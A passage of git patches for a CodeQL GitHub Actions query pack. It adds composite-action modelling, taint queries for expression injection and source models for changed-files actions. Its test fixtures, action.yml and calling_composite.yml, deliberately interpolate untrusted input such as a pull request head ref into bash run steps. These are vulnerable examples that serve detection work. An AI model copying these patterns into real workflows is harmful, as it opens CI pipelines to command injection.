+++ .../test/.github/workflows/changed-files.yml | 2 - ql/src/test/composite-actions/action.yml | 50 +++++++++++ 13 files changed, 243 insertions(+), 62 deletions(-) create mode 100644 ql/src/Security/CWE-020/CompositeActionSummaries.ql create mode 100644 ql/src/Security/CWE-020/CompositeActionsSources.ql create mode 100644 ql/src/test/.github/workflows/calling_composite.yml create mode 100644 ql/src/test/composite-actions/action.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 61f2d8e91d7..0685b2fc14d 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -27,6 +27,25 @@ class Statement extends AstNode { } */ class Expression extends Statement { } +/** + * A composite action + */ +class CompositeActionStmt extends Statement instanceof Actions::CompositeAction { + RunsStmt getRunsStmt() { result = super.getRuns() } + + InputsStmt getInputsStmt() { result = this.(YamlMapping).lookup("inputs") } + + OutputsStmt getOutputsStmt() { result = this.(YamlMapping).lookup("outputs") } + + string getName() { result = this.getLocation().getFile().getRelativePath() } +} + +class RunsStmt extends Statement instanceof Actions::Runs { + StepStmt getAStepStmt() { result = super.getSteps().getElementNode(_) } + + StepStmt getStepStmt(int i) { result = super.getSteps().getElementNode(i) } +} + /** * A Github Actions Workflow */ @@ -43,67 +62,45 @@ class ReusableWorkflowStmt extends WorkflowStmt { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - ReusableWorkflowInputsStmt getInputsStmt() { - result = workflow_call.(YamlMapping).lookup("inputs") - } + InputsStmt getInputsStmt() { result = workflow_call.(YamlMapping).lookup("inputs") } - ReusableWorkflowOutputsStmt getOutputsStmt() { - result = workflow_call.(YamlMapping).lookup("outputs") - } + OutputsStmt getOutputsStmt() { result = workflow_call.(YamlMapping).lookup("outputs") } string getName() { result = this.getLocation().getFile().getRelativePath() } } -class ReusableWorkflowInputsStmt extends Statement instanceof YamlMapping { - ReusableWorkflowInputsStmt() { - exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) - } +class InputsStmt extends Statement instanceof YamlMapping { + YamlMapping parent; + + InputsStmt() { parent.lookup("inputs") = this } /** - * Gets a specific parameter expression (YamlMapping) by name. - * eg: - * on: - * workflow_call: - * inputs: - * config-path: - * required: true - * type: string - * secrets: - * token: - * required: true + * Gets a specific input expression (YamlMapping) by name. */ - ReusableWorkflowInputExpr getInputExpr(string name) { + InputExpr getInputExpr(string name) { result.(YamlString).getValue() = name and this.(YamlMapping).maps(result, _) } } -class ReusableWorkflowInputExpr extends Expression instanceof YamlString { } +class OutputsStmt extends Statement instanceof YamlMapping { + YamlMapping parent; -class ReusableWorkflowOutputsStmt extends Statement instanceof YamlMapping { - ReusableWorkflowOutputsStmt() { - exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("outputs") = this) - } + OutputsStmt() { parent.lookup("outputs") = this } /** - * Gets a specific parameter expression (YamlMapping) by name. - * eg: - * on: - * workflow_call: - * outputs: - * firstword: - * description: "The first output string" - * value: ${{ jobs.example_job.outputs.output1 }} - * secondword: - * description: "The second output string" - * value: ${{ jobs.example_job.outputs.output2 }} + * Gets a specific output expression (YamlMapping) by name. */ - ReusableWorkflowOutputExpr getOutputExpr(string name) { + OutputExpr getOutputExpr(string name) { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result } } -class ReusableWorkflowOutputExpr extends Expression instanceof YamlString { } +// TODO: Needs a characteristic predicate otherwise anything is an output expression +class InputExpr extends Expression instanceof YamlString { } + +// TODO: Needs a characteristic predicate otherwise anything is an output expression +class OutputExpr extends Expression instanceof YamlString { } /** * A Job is a collection of steps that run in an execution environment. @@ -369,7 +366,7 @@ class StepOutputAccessExpr extends ExprAccessExpr { } override Expression getRefExpr() { - this.getJobStmt() = result.(StepStmt).getJobStmt() and + this.getLocation().getFile() = result.getLocation().getFile() and result.(StepStmt).getId() = stepId } } @@ -413,10 +410,10 @@ class JobOutputAccessExpr extends ExprAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ inputs.foo }}` */ -class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { +class InputAccessExpr extends ExprAccessExpr { string paramName; - ReusableWorkflowInputAccessExpr() { + InputAccessExpr() { paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) } @@ -425,6 +422,11 @@ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { w.getLocation().getFile() = this.getLocation().getFile() and w.getInputsStmt().getInputExpr(paramName) = result ) + or + exists(CompositeActionStmt a | + a.getLocation().getFile() = this.getLocation().getFile() and + a.getInputsStmt().getInputExpr(paramName) = result + ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 0dd34ff926f..bb0c25dbdf6 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -88,6 +88,8 @@ module CfgScope { abstract class CfgScope extends AstNode { } class WorkflowScope extends CfgScope instanceof WorkflowStmt { } + + class CompositeActionScope extends CfgScope instanceof CompositeActionStmt { } } private module Implementation implements CfgShared::InputSig { @@ -120,9 +122,15 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } - predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(WorkflowStmt), e) } + predicate scopeFirst(CfgScope scope, AstNode e) { + first(scope.(WorkflowStmt), e) or + first(scope.(CompositeActionStmt), e) + } - predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(WorkflowStmt), e, c) } + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { + last(scope.(WorkflowStmt), e, c) or + last(scope.(CompositeActionStmt), e, c) + } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } @@ -139,6 +147,28 @@ private import CfgImpl private import Completion private import CfgScope +private class CompositeActionTree extends StandardPreOrderTree instanceof CompositeActionStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + ( + child = this.(CompositeActionStmt).getInputsStmt() or + child = this.(CompositeActionStmt).getOutputsStmt() or + child = this.(CompositeActionStmt).getRunsStmt() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class RunsTree extends StandardPreOrderTree instanceof RunsStmt { + override ControlFlowTree getChildNode(int i) { result = super.getStepStmt(i) } +} + private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt { override ControlFlowTree getChildNode(int i) { if this instanceof ReusableWorkflowStmt @@ -169,8 +199,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt } } -private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof ReusableWorkflowInputsStmt -{ +private class InputsTree extends StandardPreOrderTree instanceof InputsStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | @@ -183,10 +212,9 @@ private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof } } -private class InputExprTree extends LeafTree instanceof ReusableWorkflowInputExpr { } +private class InputExprTree extends LeafTree instanceof InputExpr { } -private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof ReusableWorkflowOutputsStmt -{ +private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | @@ -199,7 +227,7 @@ private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceo } } -private class OutputExprTree extends LeafTree instanceof ReusableWorkflowOutputExpr { } +private class OutputExprTree extends LeafTree instanceof OutputExpr { } private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 120444863e5..fae6c74b0b3 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -161,3 +161,14 @@ private class ExternallyDefinedSource extends RemoteFlowSource { override string getSourceType() { result = soutceType } } + +/** + * Composite action input sources + */ +private class CompositeActionInputSource extends RemoteFlowSource { + CompositeActionStmt c; + + CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() } + + override string getSourceType() { result = "Composite action input" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index cafd6083276..750a4011320 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -83,7 +83,7 @@ predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { line = script.splitAt("\n") and ( line.regexpMatch(".*::set-output\\s+name.*") or - line.regexpMatch(".*>>\\s*$GITHUB_ENV.*") + line.regexpMatch(".*>>\\s*\\$GITHUB_OUTPUT.*") ) and script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index ee59e25ab20..79bd48b395a 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -82,7 +82,10 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflowStmt then result = this.(ReusableWorkflowStmt).getName() - else none() + else + if this instanceof CompositeActionStmt + then result = this.(CompositeActionStmt).getName() + else none() } } @@ -190,11 +193,11 @@ predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { } /** - * Holds if there is a local flow step between a ${{}} expression accesing a reusable workflow input variable and the input itself + * Holds if there is a local flow step between a ${{}} expression accesing an input variable and the input itself * e.g. ${{ inputs.foo }} */ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, ReusableWorkflowInputAccessExpr astTo | + exists(Expression astFrom, InputAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index a14b0693874..d83608dc2b8 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -48,7 +48,7 @@ class ExprNode extends Node, TExprNode { * Reusable workflow input nodes */ class ParameterNode extends ExprNode { - private ReusableWorkflowInputExpr parameter; + private InputExpr parameter; ParameterNode() { this.asExpr() = parameter and @@ -63,7 +63,7 @@ class ParameterNode extends ExprNode { override Location getLocation() { result = parameter.getLocation() } - ReusableWorkflowInputExpr getInputExpr() { result = parameter } + InputExpr getInputExpr() { result = parameter } } /** @@ -87,7 +87,8 @@ class ReturnNode extends ExprNode { ReturnNode() { this.getCfgNode() = node and - node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) + (node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) or + node.getAstNode() = any(CompositeActionStmt a).getOutputsStmt().getOutputExpr(_)) } ReturnKind getKind() { result = TNormalReturn() } diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 36c268ecc99..4b2be43bbda 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -45,7 +45,7 @@ query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode query predicate cfgNodes(Cfg::Node n) { //any() - n.getAstNode() instanceof ReusableWorkflowOutputsStmt + n.getAstNode() instanceof OutputsStmt } query predicate dfNodes(DataFlow::Node e) { diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql new file mode 100644 index 00000000000..46a7797e2b2 --- /dev/null +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -0,0 +1,36 @@ +/** + * @name Composite Action Summaries + * @description Actions that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-summaries + * @tags actions + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class OutputVariableSink extends DataFlow::Node { + OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, "Summary" diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql new file mode 100644 index 00000000000..09556ac1b78 --- /dev/null +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -0,0 +1,38 @@ +/** + * @name Composite Action Sources + * @description Actions that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-sources + * @tags actions + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class OutputVariableSink extends DataFlow::Node { + OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) and + not exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, "Source" diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 7953c3b037c..6860f091d5e 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -6,7 +6,7 @@ * @problem.severity warning * @security-severity 9.3 * @precision high - * @id actions/command-injection + * @id actions/expression-injection * @tags actions * security * external/cwe/cwe-094 diff --git a/ql/src/test/.github/workflows/calling_composite.yml b/ql/src/test/.github/workflows/calling_composite.yml new file mode 100644 index 00000000000..79c2d072ef5 --- /dev/null +++ b/ql/src/test/.github/workflows/calling_composite.yml @@ -0,0 +1,14 @@ +on: [push] + +jobs: + hello_world_job: + runs-on: ubuntu-latest + name: A job to say hello + steps: + - uses: actions/checkout@v4 + - id: foo + uses: some-org/test-action@v1 + with: + who-to-greet: ${{ github.event.pull_request.head.ref }} + - run: echo ${{ steps.foo.outputs.reflected}} + - run: echo ${{ steps.foo.outputs.tainted}} diff --git a/ql/src/test/.github/workflows/changed-files.yml b/ql/src/test/.github/workflows/changed-files.yml index 0a47960517f..12bade510ba 100644 --- a/ql/src/test/.github/workflows/changed-files.yml +++ b/ql/src/test/.github/workflows/changed-files.yml @@ -13,8 +13,6 @@ jobs: - uses: actions/checkout@v4 with: fetch-depth: 0 - - # Example 1 - name: Get changed files id: changed-files uses: tj-actions/changed-files@v40 diff --git a/ql/src/test/composite-actions/action.yml b/ql/src/test/composite-actions/action.yml new file mode 100644 index 00000000000..c43d5fd6694 --- /dev/null +++ b/ql/src/test/composite-actions/action.yml @@ -0,0 +1,50 @@ +name: 'Hello World' +description: 'Greet someone' +inputs: + who-to-greet: # id of input + description: 'Who to greet' + required: true + default: 'World' +outputs: + reflected: + description: "Reflected input" + value: ${{ steps.reflector.outputs.reflected }} + tainted: + description: "Reflected input" + value: ${{ steps.source.outputs.tainted}} + +runs: + using: "composite" + steps: + - name: Secure Set Greeting + run: echo "Hello $INPUT_WHO_TO_GREET." + shell: bash + env: + INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} + - name: Remove foo + id: replace + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ inputs.who-to-greet }} + find: 'foo' + replace: '' + - id: sink + run: echo ${{ steps.replace.outputs.value }} + shell: bash + - name: Vulnerable Set Greeting + run: echo "Hello ${{ inputs.who-to-greet }}." + shell: bash + - id: reflector + run: echo "reflected=$(echo $INPUT_WHO_TO_GREET)" >> $GITHUB_OUTPUT + shell: bash + env: + INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }} + - id: changed-files + uses: tj-actions/changed-files@v40 + - id: source + run: echo "tainted=$(echo $TAINTED)" >> $GITHUB_OUTPUT + shell: bash + env: + TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} + + From cc3f2eed68329d37539675aa3a15c3798495feb3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 13 Feb 2024 11:24:16 +0100 Subject: [PATCH 0023/1267] add characteristic predicates to InputExpr and OutputExpr --- ql/lib/codeql/actions/Ast.qll | 10 ++++++---- ql/lib/codeql/actions/controlflow/internal/Cfg.qll | 6 +----- 2 files changed, 7 insertions(+), 9 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 0685b2fc14d..c7573dfb839 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -96,11 +96,13 @@ class OutputsStmt extends Statement instanceof YamlMapping { } } -// TODO: Needs a characteristic predicate otherwise anything is an output expression -class InputExpr extends Expression instanceof YamlString { } +class InputExpr extends Expression instanceof YamlString { + InputExpr() { exists(InputsStmt inputs | inputs.(YamlMapping).maps(this, _)) } +} -// TODO: Needs a characteristic predicate otherwise anything is an output expression -class OutputExpr extends Expression instanceof YamlString { } +class OutputExpr extends Expression instanceof YamlString { + OutputExpr() { exists(OutputsStmt outputs | outputs.(YamlMapping).maps(_, this)) } +} /** * A Job is a collection of steps that run in an execution environment. diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index bb0c25dbdf6..8d044c827a2 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -35,11 +35,7 @@ module Completion { override string toString() { result = "BooleanCompletion(" + value + ")" } - override predicate isValidForSpecific(AstNode e) { - none() - // TODO: add support for conditional expressions? - //e = any(ConditionalExpression c).getCondition() - } + override predicate isValidForSpecific(AstNode e) { none() } override BooleanSuccessor getAMatchingSuccessorType() { result.getValue() = value } From 271c512f4d05ba0778c81b8c9e8b553560631a72 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 13 Feb 2024 11:40:22 +0100 Subject: [PATCH 0024/1267] better identification of Composite Actions input and output nodes --- ql/lib/codeql/actions/Ast.qll | 10 ++++++-- .../dataflow/internal/DataFlowPublic.qll | 25 +++++++++---------- .../CWE-020/CompositeActionSummaries.ql | 10 ++++---- .../CWE-020/CompositeActionsSources.ql | 13 +++++----- 4 files changed, 31 insertions(+), 27 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index c7573dfb839..6307897685f 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -92,7 +92,8 @@ class OutputsStmt extends Statement instanceof YamlMapping { * Gets a specific output expression (YamlMapping) by name. */ OutputExpr getOutputExpr(string name) { - this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result + this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or + this.(YamlMapping).lookup(name) = result } } @@ -101,7 +102,12 @@ class InputExpr extends Expression instanceof YamlString { } class OutputExpr extends Expression instanceof YamlString { - OutputExpr() { exists(OutputsStmt outputs | outputs.(YamlMapping).maps(_, this)) } + OutputExpr() { + exists(OutputsStmt outputs | + outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or + outputs.(YamlMapping).lookup(_) = this + ) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index d83608dc2b8..0204015ac22 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -48,22 +48,22 @@ class ExprNode extends Node, TExprNode { * Reusable workflow input nodes */ class ParameterNode extends ExprNode { - private InputExpr parameter; + private InputExpr input; ParameterNode() { - this.asExpr() = parameter and - parameter = any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(_) + this.asExpr() = input and + input = any(InputsStmt s).getInputExpr(_) } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - parameter = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) + input = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) } - override string toString() { result = parameter.toString() } + override string toString() { result = "input " + input.toString() } - override Location getLocation() { result = parameter.getLocation() } + override Location getLocation() { result = input.getLocation() } - InputExpr getInputExpr() { result = parameter } + InputExpr getInputExpr() { result = input } } /** @@ -83,19 +83,18 @@ class ArgumentNode extends ExprNode { * Reusable workflow output nodes */ class ReturnNode extends ExprNode { - private Cfg::Node node; + private OutputExpr output; ReturnNode() { - this.getCfgNode() = node and - (node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) or - node.getAstNode() = any(CompositeActionStmt a).getOutputsStmt().getOutputExpr(_)) + this.asExpr() = output and + output = any(OutputsStmt s).getOutputExpr(_) } ReturnKind getKind() { result = TNormalReturn() } - override string toString() { result = "return " + node.toString() } + override string toString() { result = "output " + output.toString() } - override Location getLocation() { result = node.getLocation() } + override Location getLocation() { result = output.getLocation() } } /** Gets the node corresponding to `e`. */ diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index 46a7797e2b2..00a70eeed2f 100644 --- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -15,16 +15,16 @@ import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow -private class OutputVariableSink extends DataFlow::Node { - OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) } -} - private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { + source instanceof DataFlow::ParameterNode and exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof DataFlow::ReturnNode and + exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } } module MyFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 09556ac1b78..f67811b3f5f 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -15,18 +15,17 @@ import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow -private class OutputVariableSink extends DataFlow::Node { - OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) } -} - private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) and - not exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + not source instanceof DataFlow::ParameterNode and + exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof DataFlow::ReturnNode and + exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } } module MyFlow = TaintTracking::Global; From 68901e252c70cba0add42f17a7074fa29b17f37c Mon Sep 17 00:00:00 2001 From: jorgectf Date: Tue, 13 Feb 2024 13:18:52 +0100 Subject: [PATCH 0025/1267] Add some changed-files sources --- .../codeql/actions/dataflow/ExternalFlow.qll | 2 +- ql/lib/ext/REMOVEME.model.yml | 6 --- .../ext/ahmadnassri_action-changed-files.yml | 9 +++++ ql/lib/ext/dorny_paths-filter.yml | 7 ++++ ...> frabert_replace-string-action.model.yml} | 0 ql/lib/ext/jitterbit_get-changed-files.yml | 19 +++++++++ ...actions-find-and-replace-string.model.yml} | 4 +- ql/lib/ext/tj-actions-changed-files.model.yml | 28 ------------- ql/lib/ext/tj-actions_changed-files.model.yml | 39 +++++++++++++++++++ .../ext/tj-actions_verify-changed-files.yml | 7 ++++ 10 files changed, 83 insertions(+), 38 deletions(-) delete mode 100644 ql/lib/ext/REMOVEME.model.yml create mode 100644 ql/lib/ext/ahmadnassri_action-changed-files.yml create mode 100644 ql/lib/ext/dorny_paths-filter.yml rename ql/lib/ext/{frabert-replace-string-action.model.yml => frabert_replace-string-action.model.yml} (100%) create mode 100644 ql/lib/ext/jitterbit_get-changed-files.yml rename ql/lib/ext/{mad9000-actions-find-and-replace-string.model.yml => mad9000_actions-find-and-replace-string.model.yml} (56%) delete mode 100644 ql/lib/ext/tj-actions-changed-files.model.yml create mode 100644 ql/lib/ext/tj-actions_changed-files.model.yml create mode 100644 ql/lib/ext/tj-actions_verify-changed-files.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index b19fbcbaca6..402372300fb 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -22,7 +22,7 @@ predicate sinkModel(string action, string version, string input, string kind) { * Fields: * - action: Fully-qualified action name (NWO) * - version: Either '*' or a specific SHA/Tag - * - input arg: sink node (prefixed with either `env.` or `input.`) + * - input: sink node (prefixed with either `env.` or `input.`) * - kind: sink kind */ predicate sinkNode(DataFlow::ExprNode sink, string kind) { diff --git a/ql/lib/ext/REMOVEME.model.yml b/ql/lib/ext/REMOVEME.model.yml deleted file mode 100644 index b21aa207bb2..00000000000 --- a/ql/lib/ext/REMOVEME.model.yml +++ /dev/null @@ -1,6 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: sinkModel - data: - - [ "FAKE-mad9000/actions-find-and-replace-string", "*", "source", "expression-injection" ] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.yml b/ql/lib/ext/ahmadnassri_action-changed-files.yml new file mode 100644 index 00000000000..c5e4df09e3a --- /dev/null +++ b/ql/lib/ext/ahmadnassri_action-changed-files.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files" ] + - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files" ] + - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files" ] + - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files" ] diff --git a/ql/lib/ext/dorny_paths-filter.yml b/ql/lib/ext/dorny_paths-filter.yml new file mode 100644 index 00000000000..c78e9e08e70 --- /dev/null +++ b/ql/lib/ext/dorny_paths-filter.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "dorny/paths-filter", "*", "changes", "pull_request", "PR changed files" ] + - [ "dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files" ] diff --git a/ql/lib/ext/frabert-replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml similarity index 100% rename from ql/lib/ext/frabert-replace-string-action.model.yml rename to ql/lib/ext/frabert_replace-string-action.model.yml diff --git a/ql/lib/ext/jitterbit_get-changed-files.yml b/ql/lib/ext/jitterbit_get-changed-files.yml new file mode 100644 index 00000000000..8d2798f3736 --- /dev/null +++ b/ql/lib/ext/jitterbit_get-changed-files.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files" ] 